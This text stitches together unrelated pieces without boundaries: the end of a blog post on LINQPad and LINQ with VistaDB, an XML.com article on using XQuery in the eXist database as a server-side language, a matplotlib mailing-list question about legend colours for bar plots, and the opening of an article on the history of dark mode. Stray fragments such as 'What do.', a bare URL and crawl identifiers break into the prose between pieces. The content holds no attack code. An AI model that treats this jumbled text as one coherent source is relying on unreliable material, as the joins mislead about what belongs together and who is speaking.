LINQPad show me another way of doing the same query. Sometimes one syntax or another is much clearer to me on what is happening. I took the Lambda version and executed it to get the same results. The SQL option doesn’t work for anything other than Linq2Sql entities, because Entity Framework doesn’t give you a nice way to get the SQL out of an execution. Hopefully this post will get you off to learn more LINQ using VistaDB (or any other third party EF provider actually). LINQ is one of those technologies that has a huge learning curve to it, but the rewards are pretty spectacular once you have a basic grasp of the syntax. You can do things much more expressively in LINQ than you can using SQL. The ability to query your objects within your native programming language is a big change in how programmers access and manipulate data. I find that I enjoy writing LINQ queries in LINQPad due to the instant feedback of running the queries. There are a LOT of powerful options in LINQPad that I have not even touched on here. Maybe another post with more details about the power of LINQPad would be in order. What do.
http://www.codeproject.com/script/Articles/View.aspx?aid=310670
CC-MAIN-2014-23
refinedweb
1,423
71.65
XQuery, the Server LanguageXQuery, the Server Language. For instance, we can create the traditional "Hello, World!" application as a web service, as shown in Listing 1 (hello_world.xq). let $user := request:get-parameter("user","World") let $message := if ($<input type="submit" value="Go!"/></p> else <p>Hi, {$user}! Welcome to the Hello, World Example!</p> let $page := <html> <head> <title>Hello, {$user}!</title> </head> <body> <h1>Hello, {$user}!</h1> <form method="get" action="hello_world.xq"> {$message} </form> </body> </html> return $page Listing 1: Hello, World, rendered in eXist's XQuery language The eXist engine runs this XQuery as a REST based service, invocable from the command line. For instance, the document above might be given as. where this particular file is actually stored within the database itself. The (: :) characters serve as comment delimiters The let keyword indicates the declaration and definition of a variable, with assignment being made explicitly using the := notation (with the bare equal sign serving to act as a Boolean comparison operator). Where things get a little strange is in the notion of containment. A single XML node (with or without children) also carries with it its own sense of "blockness," so that expressions such as if/then/else require either static values (such as numbers or strings), single XML elements (with or without children) or sequences of nodes and values delimited by parentheses. Thus, in the $message declaration, both the then and the else clauses return single elements. The bracket notation within elements and attributes serves the same purpose as bracket notation within XSLT: it evaluates the XPath expressions and returns the results in the appropriate context, though unlike XSLT bracketed expressions can return elements or attributes, not just strings (meaning that you have to be more careful when writing bracketed XQuery that you're not attempting to test a string vs. an element or attribute inadvertently. This can be seen in the insertion of the $message element within the larger XHTML template. XQuery makes use of what has become known as FLWOR (flower) notation, where the term is an acronym for the five primary keywords of XQuery notation: For, Let, Where, Order by and Return. Typically all XQuery statements have at a minimum at least one for or let expression, and then has a final return statement indicating what gets passed back out of the overall filter. Similarly, assignment statements can contain secondary for/let/if/then/else expressions, with the return keyword indicating the returned value or expression to be passed back to the assigned variable. Thus, in Listing 1, the line: return $ page at the very end of the XQuery returns the element defined in the variable $page. In an open query like the one above, this final return is used by eXist to pass the information to the servlet's output, in essence writing the buffers and sending the contents to the client. I've deliberately held off discussing the first line of listing 1. The expression let $user := request:get-parameter("user","World") assigns to the variable user the results of the get-parameter() function in the request namespace. Put another way, this looks at either the incoming query string (if the HTML form in question used the GET method) or the post name/value data (if the method was POST) for the parameter user. If the parameter exists, then use it, otherwise, use the parameter value "World". This call is a staple of just about any server language. The ability to pull parameters from user input was one of the first reasons for building server-side scripting languages, but this is an eXist feature, not an XQuery one. However, the benefits of this particular feature should be obvious: if you can access information from the client, modify your outgoing streams (something that can be accomplished with the corresponding response: namespace) and maintain session and authentication information, then you have all of the functions necessary for a server language. One of the more important features of XPath 2, upon which XQuery is based, comes from the realization that extensions are inevitable. There will always be things that fall beyond the immediate scope of the language but that are important to you as the developer. For this reason, XPath 2 (and hence XQuery) includes very clear conventions for defining additional functionality to the language...a fact which implies that other XML database vendors may very well want to look at this functionality and see whether it enhances their own products. The eXist database defines a number of these namespaces out of the box. From the standpoint of servlet development, perhaps the most important namespaces are as follows: request: provides access to information sent from the client. Functions include get-cookie-names, get-cookie-value, get-data, get-header, get-header-names, get-method, get-parameter, get-parameter-names, get-server-name, get-uploaded-file, get-uploaded-file-name, and get-url. response: lets the developer control the stream of data being sent back to the client. Functions include redirect-to, set-cookie, set-header, and stream-binary. session: provides control over the user's HTTP sesssion. Functions include create, encode-url, get-attribute, get-attribute-names, get-id, invalidate, set-attribute, and set-current-user. transform: lets the developer transform an XML node using XSLT from within the xquery. Functions include transform and stream-transform. update: The update commands (distinct from a namespace) let you perform live updates of the data in the eXist XML database, either at the granular level of changing a value in the database or at the level of inserting or removing whole documents. This addresses one of the big shortcomings of XQuery, in that it provides for an effective read-write solution that can be invoked from within an XQuery. Other extensions can be compiled in by rebuilding the Java JAR (a shell or batch script automates this process) for doing such things as writing SQL queries and updates designed to work with any JDBC compliant SQL database, such as Oracle, mySQL, Postgres, or SQL Server. This capability is especially important because it provides a bridge between the SQL and XML worlds, letting you perform complex queries (or updates) on your SQL database then passing this information to the XQuery to be additionally processed, filtered, sorted, or transformed. Additionally, other extensions give access to a full range of math functions (including the oh-so-useful math:random function), let you send mail through an SMTP server, retrieve (and to a certain extent modify) images (which can also be stored in the database, by the way), and other functions that provide functionality more associated with a full bore server-side scripting language than an XML query language.. XML.com Copyright © 1998-2006 O'Reilly Media, Inc.
http://www.xml.com/lpt/a/1704
crawl-002
refinedweb
1,128
50.16
Back to: ASP.NET Core Tutorials For Beginners and Professionals ViewModel in ASP.NET Core MVC Application In this article, I am going to discuss ViewModel in ASP.NET Core MVC application with an example. Please read our previous article before proceeding to this article where we discussed Strongly Typed View in ASP.NET Core MVC application. As part of this article, we are going to discuss the following pointers. - What is a View Model in ASP.NET Core? - Why do we need the View Model? - How to implement the View Model in ASP.NET Core Application? What is a ViewModel in ASP.NET Core MVC? In real-time applications, a single model object may not contain all the data required for a view. In such situations, we need to use ViewModel in the ASP.NET Core MVC application. So in simple words, we can say that a ViewModel in ASP.NET Core MVC is a model that contains more than one model data required for a particular view. Combining multiple model objects into a single view model object provides us better optimization. Understanding the ViewModel in ASP.NET Core MVC: The following diagram shows the visual representation of a view model in the ASP.NET Core MVC application. Let say we want to display the student details in a view. We have two different models to represent the student data. The Student Model is used to represent the student basic details where the Address model is used to represent the address of the student. Along with the above two models, we also required some static information like page header and page title in the view. If this is our requirement then we need to create a view model let say StudentDetailsViewModel and that view model will contain both the models (Student and Address) as well as properties to store the page title and page header. Creating the Required Models: First, create a class file with the name Student.cs within the Models folder of your application. This is the model that is going to represent the basic information of a student such as a name, branch, section, etc.; } } } Next, we need to create the Address model which is going to represent the Student Address such as City, State, Country, etc. So, create a class file with the name Address.cs within the Models folder and then copy and paste the following code in it. namespace FirstCoreMVCApplication.Models { public class Address { public int StudentId { get; set; } public string City { get; set; } public string State { get; set; } public string Country { get; set; } public string Pin { get; set; } } } Creating the View Model: Now we need to create the View Model which will store the required data that is required for a particular view. In our case its student’s Details view. This View Model is going to represent the Student Model + Student Address Model + Some additional data like page title and page header. You can create the View Models anywhere in your application, but it is recommended to create all the View Models within a folder called ViewModels to keep the things organized. So first create a folder at the root directory of your application with the name ViewModels and then create a class file with the name StudentDetailsViewModel.cs within the ViewModels folder. Once you create the StudentDetailsViewModel.cs class file, then copy and paste the following code in it. using FirstCoreMVCApplication.Models; namespace FirstCoreMVCApplication.ViewModels { public class StudentDetailsViewModel { public Student Student { get; set; } public Address Address { get; set; } public string Title { get; set; } public string Header { get; set; } } } We named the ViewModel class as StudentDetailsViewModel. Here the word Student represents the Controller name, the word Details represent the action method name within the Student Controller. As it is a view model so we prefixed the word ViewModel. Although it is not mandatory to follow this naming convention, I personally prefer it to follow this naming convention to organize view models. Creating Student Controller: Right-click on the Controllers folder and then add a new class file with the name StudentController.cs and then copy and paste the following code in it. using FirstCoreMVCApplication.Models; using FirstCoreMVCApplication.ViewModels; using Microsoft.AspNetCore.Mvc; namespace FirstCoreMVCApplication.Controllers { public class StudentController : Controller { public ViewResult Details() { //Student Basic Details Student student = new Student() { StudentId = 101, Name = "Dillip", Branch = "CSE", Section = "A", Gender = "Male" }; //Student Address Address address = new Address() { StudentId = 101, City = "Mumbai", State = "Maharashtra", Country = "India", Pin = "400097" }; //Creating the View model StudentDetailsViewModel studentDetailsViewModel = new StudentDetailsViewModel() { Student = student, Address = address, Title = "Student Details Page", Header = "Student Details", }; //Pass the studentDetailsViewModel to the view return View(studentDetailsViewModel); } } } As you can see, now we are passing the view model as a parameter to the view. This is the view model that contains all the data required by the Details view. As you can notice, now we are not using any ViewData or ViewBag to pass the Page Title and Header to the view instead they are also part of the ViewModel which makes it a strongly typed view. Creating the Details View: First, add a folder with the name Student within the Views folder your project. Once you add the Student Folder, then you need to add a razor view file with the name Details.cshtml within the Student folder. Once you add the Details.cshtml view then copy and paste the following code in it. @model FirstCoreMVCApplication.ViewModels.StudentDetailsViewModel <html xmlns=" <head> <title>@Model.Title</title> </head> <body> <h1>@Model.Header</h1> <div> StudentId : @Model.Student.StudentId </div> <div> Name : @Model.Student.Name </div> <div> Branch : @Model.Student.Branch </div> <div> Section : @Model.Student.Section </div> <div> Gender : @Model.Student.Gender </div> <h1>Student Address</h1> <div> City : @Model.Address.City </div> <div> State : @Model.Address.State </div> <div> Country : @Model.Address.Country </div> <div> Pin : @Model.Address.Pin </div> </body> </html> Now, the Details view has access to the StudentDetailsViewModel object that we passed from the controller action method using the View() extension method. By using the @model directive, we set StudentDetailsViewModel as the Model for the Details view. Then we access Student, Address, Title, and Header using @Model property. Now run the application, and navigate to the “/Student/Details” URL and you will see the output as expected on the webpage as shown in the below image. In the next article, I am going to discuss the Routing in ASP.NET Core MVC application with an example. Here, in this article, I try to explain the ViewModel in ASP.NET Core MVC application with an example. I hope you understood the need and use of ViewModel in ASP.NET Core MVC Application. 3 thoughts on “ViewModel in ASP.NET Core MVC” No need for these two lines in the StudentController code: ViewBag.Title = “Student Details Page”; ViewBag.Header = “Student Details”; As Ahmed has already pointed above, setting the values for ViewBag.Title and ViewBag.Header is not required as we are using strongly typed model. They are not being used anyway. Further, can you please write a guide on using a ViewModel for a form and submitting it back to the controller? Thanks. Yes. There is no need. Thanks for identifying the issue. We have corrected this.
https://dotnettutorials.net/lesson/view-model-asp-net-core-mvc/
CC-MAIN-2022-21
refinedweb
1,204
58.79
Readers of my earlier installments on RELAX NG (Part 1 and Part 2).: When converted to XML syntax, use of this declaration appends an "ns" attribute to the root element of the schema. If this namespace is not explicitly specified, the default default namespace is used, and is declared with the root attribute, such as: You may also declare an external namespace for elements or attributes: This allows you to describe elements like: When converted to XML syntax, the namespace URL is added to the root tag as an extra attribute: The namespace "a" is a bit special here. RELAX NG allows annotations, which are basically just tags with the "a" namespace. In compact syntax, you can avoid thinking about namespaces by adding an annotation with initial double hash marks: Converted to XML syntax, this annotation appears as: By the way, a single leading hash introduces a comment instead of an annotation, so the following compact syntax form: corresponds to this XML form: You can also use a slightly odd compact syntax form to specify other annotations within the "a" namespace: A root attribute "xmlns:a" will be specified automatically in the XML syntax if annotations are used, but since "a" is just another namespace, you can specify your own URL if you want. The default attribute is equivalent to specifying: One more special namespace is specified differently in both syntax forms. Data types rely on a modular specification, usually using W3C XML Schema data types. You may specify these with compact syntax: or XML syntax:: Listing 1. A nested compact syntax schema: Listing 2. Using groups for quantification In this case, a valid document's root <foo> element might contain several <bar></bar><baz></baz> sequences prior to one final <bam> element. There is no way to express the same concept by only quantifying the individual "bar" and "baz" elements.: Listing 3. A context-free compact syntax schema: Listing 4. A context-free XML syntax schema.. - Participate in the discussion forum. - Download the xvif library. For a somewhat more polished tool, 4Suite incorporates xvif for RELAX NG validation. The command-line tool 4xml will validate against both RELAX NG and DTDs, with various options. 4Suite includes many other tools and libraries for working with many XML-related technologies. - trang and jing are complementary tools for transformation between schemata, and validation against RELAX NG schemas. The former depends on the latter but both can be downloaded in a convenient archive here. - You will need to obtain an implementation of the Java API for XML Processing (JAXP) to use trang. If you run a Java 1.4 JVM, you are fine; otherwise, download crimson here. - DTDinst is a Java tool to for converting. - Find a collection of documents and tools presented in this series of articles here. - Read David Mertz's roundup of XML editors: Part 1 examines Java and MacOS applications(including <oXygen/>), while Part 2 looks at Windows-based products.. David Mertz thinks that the schema that is real is not the real schema. David may be reached at mertz@gnosis.cx; his life pored over at. Suggestions and recommendations on this, past, or future, columns are welcomed.
http://www.ibm.com/developerworks/xml/library/x-matters27/index.html
crawl-003
refinedweb
529
54.12
We have a new database connection and all our MXDs have to be updated. I ran a script to update the layers on a bunch of MXDs. Then I opened a map, right clicked a layer, properties, then checked under the source tab to see if the changes took place. But, the layer was still referencing the old connection. Is there a snippet I could include in this script, or something else, that verifies that the layers have indeed been updated? There is a print statement in the script, but that just prints the name of the MXD. It doesn't really give concrete proof. import arcpy import os def find_and_replace(MXD_workspace, oldPath, newPath): arcpy.env.workspace = MXD_workspace path = arcpy.env.workspace for root, dirs, files in os.walk(path): for name in files: if name.endswith(".mxd"): mxd_name = name fullpath = os.path.join(root,name) print mxd_name print fullpath mxd = arcpy.mapping.MapDocument(fullpath) for df in arcpy.mapping.ListDataFrames(mxd): for flayer in arcpy.mapping.ListLayers(mxd, "*", df): if flayer.isFeatureLayer or flayer.isRasterLayer: try: mxd.findAndReplaceWorkspacePaths(oldPath, newPath, False) print "Repaired the path for " + name except: print(mxd_name + " cannot replace paths") mxd.save() del mxd print "complete..." if __name__ == '__main__': find_and_replace(r"\\gisfile\GISmaps\AtlasMaps\ATLAS_MAPS_18\CountyBoard", r"Database Connections\BonnScott.sde", r"Database Connections\gisEddy.gissql.sde") #(path2MXDs, path2oldGDB, path2newGDB) didn't the other print statements produce anything? (ie line 21, 23
https://community.esri.com/thread/216503-verify-mxdfindandreplaceworkspacepaths
CC-MAIN-2018-34
refinedweb
236
54.9
This is the second part of story about using functional programming for prototyping (first part is Here). Originally, my intention was to document whole process of prototyping. I wished not to finish prototype and then describe it after, but to show every step in my work-flow. However, soon after I started coding, I forgot about documenting each step, and after few hours my prototype was complete. All javascript files are successfully imported in less than a second (average 626.3ms in 10 imports). After importing ten times all files Leo is still responsive. It still remains to clean and document my prototype. All that I can now say about prototyping process is that it was a pleasant and easy activity. While developing it I needed to look few times in the Python documentation about re, bisect, timeit, … Prototype Indexing source file After initial idea to split source in lines and operate on lines one by one, I ended up with manual splitting, function named so as opposed to using splitlines method. However, now I think a better name for this function would be create_source_index or something similar. def manual_splitting(src=None): src = src or get_source() chunks = [] start = -1 end = len(src) pat = re.compile('[\'"]|/\\*|//') @others dd = { '"' : lambda i: do_string(i, '"'), "'" : lambda i: do_string(i, "'"), '//': do_comment_sl, '/*': do_comment_ml, } while start < end: m = pat.search(src, start + 1) if m: start = do_code(m.start()) start = dd[m.group(0)](start) else: start = do_code(end) return (src, tuple(chunks)) test(manual_splitting, number=100) and in Log pane result: average 13.2 ms This function makes an index of source file chunks of three different types: - code - string - comment it returns an array of tuples (chunk_type, start_index, end_index). At first I considered chunks to be single line, but later it become clear that it is better to allow for multiline chunks. Helper functions defined inside this function are very simple: def do_code(i): if i > 0 and i > start + 1: chunks.append(('code', start, i)) return i def do_string(i, q): while True: i = src.find(q, i + 1) if i > -1 and src[i - 1] != '\\': break if i < 0: chunks.append(('string', start, end)) return end chunks.append(('string', start, i + 1)) return i + 1 def do_comment_sl(i): i = src.find('\n', i + 2) if i < 0: i = end while i + 1 < end and src[i + 1] == '\n': i += 1 chunks.append(('comment', start, i)) return i def do_comment_ml(i): i = src.find('*/', i + 2) + 1 if i < 1: i = end while i + 1 < end and src[i + 1] == '\n': i += 1 chunks.append(('comment', start, i)) return i As you can see they are very similar, and I really just copy/pasted them adjusting each a bit. That may be considered violation of DRY principle, but it is very localized (all of them reside inside one function). Main argument of DRY principle is that later if you change one part of duplicated code, there is a possibility that you will forget to change the other parts of code. But, since all this repeated code parts are very close to each other, DRY principle violation becomes less danger. Source file is searched with regex pattern that catches beginning of: - single line comment - multi line comment - single quote string - double quote string Searching starts in code mode, and for each beginning of another chunk type, helper function of that type is called with the starting index as first argument. Every helper function returns the end of chunk and appends chunk to chunks array. Searching for chunks After indexing source file we need a function that finds chunk for any given position in source file. I was thinking to use bisect from standard library, but it turned out that it was faster to re-implement it than to figure out how to adjust chunks array to comply to bisect rules. Now, that I write this, I realize that it could be achieved very easily, the only thing that is needed is to change the order of tuple items from (type, start, end) to (start, end, type). And to use bisect functions not on integer position, but on tuple created from the integer argument of this function. But, that may be left for the polishing phase. def find_chunk(i, chunks, low=0): isFound = lambda m: chunks[m][1] <= i and chunks[m][2] > i if isFound(low): return low upp = len(chunks) - 1 while upp > low: med = (upp + low) // 2 k, a, b = chunks[med] if isFound(med): return med if i < chunks[med][1]: upp = med - 1 else: low = med + 1 return upp if isFound(upp) else -1 # and here is a specialized version that finds nearest code chunk # after given index def find_code_chunk(i, chunks, low=0): j = find_chunk(i, chunks, low) if j < 0: return j nchunks = len(chunks) - 1 while chunks[j][0] != 'code': j += 1 if j > nchunks: return -1 return j Searching for functions Now, that we have functions to locate chunks, we can pursue our next target: finding structural blocks of source code. In javascript syntax parenthesis '()', '[]', '{}' must be properly nested. There may exists some of this characters in comment and string chunks, but they don’t count. The only ones that matter are those in code blocks. That was the reason for chunking source code in the first place. def find_next_block(i, src, chunks): # searching for the opening character pat = re.compile(r'\(|\{|\[') end = len(src) j = find_code_chunk(i, chunks) if j < 0: return i, end c_chunks = lambda:(x for x in chunks[j:] if x[0] == 'code') for k, a, b in c_chunks(): m = pat.search(src, i) if m: break else: return i, end opening_ch = m.group(0) closing_ch = {'{': '}', '[': ']', '(': ')'}[opening_ch] lev = 1 ii = m.end() for k, a, b in c_chunks(): while ii < b: if src[ii] == opening_ch: lev += 1 elif src[ii] == closing_ch: lev -= 1 ii += 1 if lev: continue return m.start(), ii return m.start(), end First we are searching for the opening character (one of '(', '[', '{'). If there is no block openings, that means we are finished. Last block will be in that case form given position to the end of file. If we find the opening character, then we continue searching from the character following opening one, counting levels as we encounter them, skiping all non code blocks. When we find closing character that resets lev to zero, we have the end index and so we return starting and ending index of the code block. There are several ways to define function in javascript. There are so called named functions in the form: But there are also anonymous functions and function expressions, which doesn’t have a name, but are assigned to a variable or passed as an argument to some other function. What is common to both cases is that they contain keyword 'function', followed by a single parenthesized block of arguments, followed by a function body which is block that starts with ‘{’ and ends with ‘}’. To find all function definitions we need to search all code blocks for a 'function' word. Whenever we find one, skip next block of arguments. The very next block contains body of function definition. End of this block is the end of function definition. def find_next_function(i): pat = re.compile(r'\bfunction\b') m = pat.search(src, i) if m: ii = m.end() a, b = find_next_block(ii, src, chunks) a, b = find_next_block(b, src, chunks) yield m.start(), b Begining can be either start of keyword function that we already have found, but may also be somewhere before. Especially if the definition is following after comment chunk. Also, if it is function expression then it is often followed by semicolon. Finally, it would be useful to have not only start and end index yielded, but headline for the node as well. It would be natural to continue search right after the end of found block. Here is a get_all_functions definition: def get_all_functions(src, chunks): pat = re.compile(r'\bfunction\b([^(]*)\(') pat2 = re.compile(r'\bObject.definePropert(?:y|ies)\s*\(([^.]+)(?:[.]prototype)?\s*,[^{]*\{') end = len(src) @others i = 0 m1 = m2 = None m1 = pat.search(src, i) m2 = pat2.search(src, i) m1, m2, m = mi(i) for j, x in enumerate(chunks): k, a, b = x if k != 'code' or i > b: continue while m: i = start_of_func(m, j) ii = m.end() + 1 if m is m1 else m.end() - 1 a1, b1 = find_next_block(ii, src, chunks) if m is m2: b2 = src.find(')', b1) if b2 > 0: b1 = b2 + 1 b1 = eat_ch(b1, ';') b1 = eat_ch(b1, '\n') yield headline_for_f(m, src), i, b1 i = b1 + 1 m1, m2, m = mi(i) if not m or m.start() > b: break There is more in this function. I have discovered two more use cases of the code blocks that should naturally be in separate nodes. One is a call to Object.defineProperty, and the other is Object.defineProperties. I have realized that they would be best put in separate nodes after trying to import files with the previous version of the function. In its final version displayed above, two different regex patterns are used. When we search source with one and the other, we can have no match at all, a single match, or two matches. Patterns are designed to return possible function name in first group. Here is a helper function that takes both match results and return tuple of three matches. The third one is the nearest match that is next to be processed. def mi(i): _m1 = pat.search(src, i) if m1 and m1.end() < i else m1 _m2 = pat2.search(src, i) if m2 and m2.end() < i else m2 if not _m1: m = _m2 elif not _m2: m = _m1 else: m = _m1 if _m1.start() < _m2.start() else _m2 return _m1, _m2, m When search has been passed after any of matches, m.end() < i, we search further for the corresponding pattern. If any of matches is None, this function would return the other match. If both of patterns did match, function returns nearest one. Pay attention to this pattern. Helper function that are defined inside a function can access variables in outer functon scope, but they can’t change them. As a consequence, local variables in the toplevel function need not to be passed to helper functions, because they are directly visible in inner scope. However, if helper function needs to change outer variable the only way is to return its new value, and let the outer function to change variables. This is very powerful pattern! Here are few more helper functions: # advances index if next character matches eat_ch = lambda i, ch: i + 1 if i < end and src[i] == ch else i # searches backward for line break def prev_nl(i): while i > 0 and src[i] != '\n': i -= 1 return i # searches backword for the start of function definition that should be # in a single vnode. def start_of_func(m, j): i = m.start(0) i = prev_nl(i) j = find_chunk(i, chunks, j) return prev_non_empty_code(i, j) # helper function that searches backward from given position for the # previous non empty code chunk def prev_non_empty_code(i, cn): while cn >= 0: k, a, b = chunks[cn] if k == 'string': i = b + 1 break if k == 'comment': cn -= 1 i = a - 1 continue while i - 1 >= a and src[i - 1].isspace(): i -= 1 if i > a: break cn -= 1 return max(0, i) # helper function that tries to guess best headline for this node def headline_for_f(m, src): if m.group(0).startswith('Object.defineProperty'): s = m.group(0) i = max(s.find('"'), s.find("'")) if i > -1: s = s[i + 1:s.find(s[i], i + 1)] return m.group(1).split(',',1)[0] + ':' + s if m.group(1) else s fnm = m.group(1).strip() isQ = lambda x: src[x] in ('"', "'") if not fnm: j = prev_ch(m.start(), src) if src[j] in ('=', ':'): j = prev_ch(j, src) k = prev_ws(j, src) + 1 if isQ(j): j -= 1 if isQ(k): k += 1 fnm = src[k: j + 1] return fnm.replace('.prototype.', ':') Building outline Now, that we have a generator that extracts function definitions from source code, we can build outline tree from extracted regions. def import_file(_v0, fname): # adding top node root of this file h = g.os_path_basename(fname) v0 = insV(_v0, h, '@others\n') src = open(fname, 'rt').read() src, chunks = manual_splitting(src) # we need access to current and subsequent function block # that is why we zip generator with itself advanced one step funcs = zip_with_next(get_all_functions(src, chunks)) # little bit of cleaning headlines and finding common parts # for creating organizer nodes. All continual nodes that # has headline with the same beginning are in one organizer node pat = re.compile('[^.:]+') h1 = '' i = 0 for fcur, fnxt in funcs: h, i, j = fcur m = pat.search(h) if m: _h1 = m.group(0) else: _h1 = h b = src[i:fnxt[1]] if fnxt else src[i:] if _h1 != h1: v = insV(v0, _h1, '') h1 = _h1 # still didn't figure out why is this necessary but it is if b.startswith('\n\n'): b = b[2:] insV(v, h, b) else: if i == 0: v0._bodyString = src And as always there are few helper functions: def zip_with_next(it): prev = nxt = None for nxt in it: if prev: yield prev, nxt prev = nxt if nxt: yield nxt, None # and a factory for vnodes def insV(v0, h, b): v = leoNodes.VNode(context=c) v._headString = h v._bodyString = b v0.children.append(v) v.parents.append(v0) return v And final profiling test of the very same file rpg_objects.js that Leo with its current implementation of c.importCommands, was struggling for more than 30s, gave the following results: 10 calls, average time 233.1 ms Isn’t it success? Let alone fact that files were imported in far better form than the original Leo import gives.
https://computingart.net/fpfproto-2.html
CC-MAIN-2021-49
refinedweb
2,324
72.66
David S. Miller writes:> From: Alan Cox <alan@cymru.net>> Date: Mon, 20 May 1996 09:56:18 +0100 (BST)>> > - isnt it mmap that should be used to implement zero-copy>> The net code folds copy and checksum so the user->kernel copy is very close> to free (it is free for most people unless there is a lot of bus activity)>>(Those who don't feel like having a quick lesson in Sparc assembly>optimization skip to end to see why this is so relevant anyways.)>>It is more than free on the Sparc I have found with 1000 hit/sec>detailed to the instruction profiling information sampled during a 2gb>TCP transfer. In cases where the memcpy() code would completely stall>(and thus clear out the entire pipeline) the csum/copy code is filling>the stalls in with "useful" work, this is especially true with chips>which lack a store buffer or worse lack write-allocate on the cache.You're looking at this the wrong way. It is *always* necessary tocompute the checksum. We are trying to decide whether it would be awin to avoid the copy. So the question is whether we can fold thecopy into the checksum without degrading the speed of the checksum andnot vice-versa. I tested the speed of csum_partial()vs. csum_partial_copy() and csum_partial_copy_fromuser() on my systemswith the included program and got the following results (smallernumber means faster): 486/66DX2 Pentium 120MHz overdrive1) csum_partial: 342 892) c_p_copy: 1018 13103) c_p_c_fromuser 1021 13174) memcpy: 978 13095) memcpy + c_p(dst): 2109 17836) memcpy + c_p(src): 2110 13947) c_p(src) + memcpy: 2105 1398(Yes, my Pentium system sucks rocks on writes. Also, it beats thehell out of me why the times for rows 1 and 4 add up to much lessthan the time for row 5 on the Pentium and rows 5-7 on the 486).csum+copy is about the same speed as memcpy, so we are getting the csum(nearly) for free. But csum_partial() copy is much faster than thecopy+csum functions, so avoiding the copy still looks like a win.Tom./* gcc -O2 -fomit-frame-pointer -o spud spud.c */#include <sys/times.h>#include <asm/checksum.h>#include "checksum.c" /* arch/i386/lib/checksum.c with #includes removed */#define SIZE 1024struct { long src[1024][SIZE/4]; long fill[100]; long dst[1024][SIZE/4];} S;#define SRC(n) ((char *)&S.src[(n)&1023])#define DST(n) ((char *)&S.src[(n)&1023])voidmain (){ struct tms start, stop; int i; times (&start); for (i = 0; i < 300000; i++) {#if 0 csum_partial (DST(i), SIZE, 0);#elif 0 csum_partial_copy (SRC(i), DST(i), SIZE, 0);#elif 0 csum_partial_copy_fromuser (SRC(i), DST(i), SIZE, 0);#elif 0 memcpy (DST(i), SRC(i), SIZE);#elif 0 memcpy (DST(i), SRC(i), SIZE); csum_partial (DST(i), SIZE, 0);#elif 0 memcpy (DST(i), SRC(i), SIZE); csum_partial (SRC(i), SIZE, 0);#else csum_partial (SRC(i), SIZE, 0); memcpy (DST(i), SRC(i), SIZE);#endif } times (&stop); printf ("%d\n", stop.tms_utime - start.tms_utime);}
https://lkml.org/lkml/1996/5/27/110
CC-MAIN-2021-31
refinedweb
506
56.49
Name | Synopsis | Description | Return Values | Errors | Usage | Examples | Attributes | See Also #include <search.h> a datum to be accessed or stored. If there is a datum in the tree equal to *key (the value pointed to by key), a pointer to this found datum is returned. Otherwise, *key is inserted, and a pointer to it returned. Only pointers are copied, so the calling routine must store the data.. tdelete() returns a pointer to the parent of the deleted node, or a null pointer if the node is not found. The twalk() function traverses a binary search tree. The root argument is the root of the tree to be traversed. (Any node in a tree may be used as the root for a walk below that node.) action is the name of a routine to be invoked at each node. This routine is, in turn, called with three arguments. The first argument is the address of the node being visited. The second argument is a value from an enumeration data type typedef enum { preorder, postorder, endorder, leaf } VISIT; (defined in <search to visiting a node before any of its children, after its left child and before its right, and after both its children. The alternate nomen), standards(5) Name | Synopsis | Description | Return Values | Errors | Usage | Examples | Attributes | See Also
http://docs.oracle.com/cd/E19082-01/819-2243/6n4i099nv/index.html
CC-MAIN-2014-10
refinedweb
218
72.76
This is probably my lack of knowledge of python, but how do I set up legend labels for some bar-plots that have been produced inside a function. For example, the following will nicely plot my bar-plots, but then legend doesn't know about the colours used, so here just uses black for both labels. I'd like the labels to have the same colour as the bars generated inside plotb. (I am using a function here as my real code has extra stuff to calculate error-bars and suchlike for each data set.) x=arange(0,5) y=array([ 1.2, 3.4, 5.4, 2.3, 1.0]) z=array([ 2.2, 0.7, 0.4, 1.3, 1.2]) def plotb(x,y,col): p=bar(x,y,color=col) plotb(x,y,'k') plotb(x+0.4,z,'y') legend(('YYY,'ZZZ')) I tried passing the object "p" through the plotb argument list, but python didn't like that. (I am just learning python, and so far haven't seen how to pass such objects around. Thanks for any tips, Dave
https://discourse.matplotlib.org/t/legend-labels-interaction-with-functions/9107
CC-MAIN-2022-21
refinedweb
186
82.04
import heapq class Solution(object): def topKFrequent(self, words, k): """ :type words: List[str] :type k: int :rtype: List[str] """ max_heap_freq = list() hashtable = dict() # calculate the frequency of all the words for word in words: # hashtable[word] = hashtable.get(word, 0) + 1 if hashtable.get(word, None) is None: hashtable[word] = 1 else: hashtable[word] += 1 # insert all the (word, freq) into the max_heap by comparing with values for word, freq in hashtable.items(): heapq.heappush(max_heap_freq, (-freq, word)) min_heap_word = [] # if the freq is same sort them by smallest alphabetical order result = [] for ki in range(k): if len(min_heap_word) > 0 and min_heap_word[0][1] != max_heap_freq[0][0]: while len(min_heap_word) > 0: result.append(heapq.heappop(min_heap_word)[0]) freq, word = heapq.heappop(max_heap_freq) heapq.heappush(min_heap_word, (word, freq)) while len(min_heap_word) > 0: result.append(heapq.heappop(min_heap_word)[0]) return result Python solution Looks like your connection to LeetCode Discuss was lost, please wait while we try to reconnect.
https://discuss.leetcode.com/topic/107070/python-solution
CC-MAIN-2017-47
refinedweb
158
55.95
Overhyped or necessity? Learn everything about dark mode and how to support it to the benefit of your users! (Originally published on.) Introduction 📚 I have done a lot of background research on the history and theory of dark mode, if you are only interested in working with dark mode, feel free to skip the introduction. Dark mode before Dark Mode We have gone full circle with dark mode. In the dawn of personal computing, dark mode wasn’t a matter of choice, but a matter of fact: Monochrome CRT computer monitors worked by firing electron beams on a phosphorescent screen and the phosphor used in early CRTs was green. Because text was displayed in green and the rest of the screen was black, these models were often referred to as green screens. The subsequently introduced Color CRTs displayed multiple colors through the use of red, green, and blue phosphors. They created white by activating all three phosphors simultaneously. With the advent of more sophisticated WYSIWYG desktop publishing, the idea of making the virtual document resemble a physical sheet of paper became popular. This is where dark-on-white as a design trend started, and this trend was carried over to the early document-based web. The first ever browser, WorldWideWeb (remember, CSS wasn’t even invented yet), displayed webpages this way. Fun fact: the second ever browser, Line Mode Browser — a terminal-based browser — was green on dark. These days, web pages and web apps are typically designed with dark text on a light background, a baseline assumption that is also hard-coded in user agent stylesheets, including Chrome’s. The days of CRTs are long over. Content consumption and creation has shifted to mobile devices that use backlit LCD or energy-saving AMOLED screens. Smaller and more transportable computers, tablets, and smartphones led to new usage patterns. Leisure tasks like web browsing, coding for fun, and high-end gaming frequently happen after-hours in dim environments. People even enjoy their devices in their beds at night-time. The more people use their devices in the dark, the more the idea of going back to the roots of light-on-dark becomes popular. Why dark mode Dark mode for aesthetic reasons When people get asked why they like or want dark mode, the most popular response is that 